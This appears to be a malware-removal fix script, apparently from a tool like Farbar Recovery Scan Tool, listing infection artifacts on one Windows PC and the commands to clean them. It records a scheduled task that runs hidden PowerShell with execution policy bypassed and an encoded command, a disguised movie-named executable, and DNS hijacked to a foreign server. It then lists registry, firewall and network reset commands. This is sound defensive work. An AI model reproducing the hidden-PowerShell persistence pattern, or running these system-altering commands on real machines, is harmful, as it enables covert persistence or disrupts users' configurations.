CreateRestorePoint:
HKU\S-1-5-21-4067499190-4158452651-832932472-1001\...\Run: [grint] => C:\ProgramData\grint.exe [15127440 2015-08-31] ()
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => No File
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => No File
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => No File
HKLM-x32\...\Run: [] => [X]
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
CHR HKU\S-1-5-21-4067499190-4158452651-832932472-1001\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
Tcpip\Parameters: [NameServer] 95.211.158.130
Tcpip\..\Interfaces\{89F9461E-DE3F-4C87-9154-D45861FF413D}: [NameServer] 95.211.158.130
Tcpip\..\Interfaces\{96809188-F85C-4950-ACEC-9F47446A34D7}: [NameServer] 95.211.158.130
Tcpip\..\Interfaces\{EF22C593-8E82-4C8B-BCC1-3D971D1DDFE1}: [NameServer] 95.211.158.130
Tcpip\..\Interfaces\{F941A1CB-FD6F-4471-B40D-CACDD34D0A3A}: [NameServer] 95.211.158.130
2015-12-28 19:41 - 2015-12-28 19:41 - 00019370 _____ C:\windows\System32\Tasks\{491A6DCB-2E1E-ACCF-813E-678E06910CAF}
2015-12-28 19:41 - 2015-12-28 19:41 - 00000000 ____D C:\ProgramData\{1e0eec9d-6064-0}
2015-12-28 19:41 - 2015-12-28 19:41 - 00000000 ____D C:\ProgramData\{1966dac7-1064-1}
2014-12-28 17:10 - 2015-01-06 17:51 - 0001014 _____ () C:\Users\archer\AppData\Local\7396d5af-93b3-4d36-bfec-04bbd1449761.dat
2015-09-20 19:04 - 2015-09-20 19:04 - 2696318 _____ () C:\ProgramData\8X4gFnnipSHGg.exe
2015-09-04 18:54 - 2015-08-31 13:53 - 15127440 ___SH () C:\ProgramData\grint.exe
Task: {EF83657C-EF9E-4218-82A9-05747B10DB28} - 
System32\Tasks\{491A6DCB-2E1E-ACCF-813E-678E06910CAF} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand
Task: {2C85D2D2-CA9F-456D-AD71-4F4369BD1A6B} - System32\Tasks\VoiceBook =>
c:\programdata\{53c11841-cfcc-3f4a-53c1-11841cfc6107}\blackhat+%282015%29+%5b1080p%5d.exe <==== ATTENTION
Task: {3959C21C-7347-4BD6-9B0B-E53839FFF249} - \Superclean -> No File <==== ATTENTION
Task: C:\windows\Tasks\VoiceBook.job => c:\programdata\{53c11841-cfcc-3f4a-53c1-11841cfc6107}\blackhat+%282015%29+%5b1080p%5d.exe <==== ATTENTION
c:\programdata\{53c11841-cfcc-3f4a-53c1-11841cfc6107}
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
RemoveProxy:
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: ipconfig /flushdns
CMD: netsh winsock reset catalog
CMD: netsh int ip reset c:\resetlog.txt
CMD: ipconfig /release
CMD: ipconfig /renew
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
EmptyTemp:
CMD: bitsadmin /reset /allusers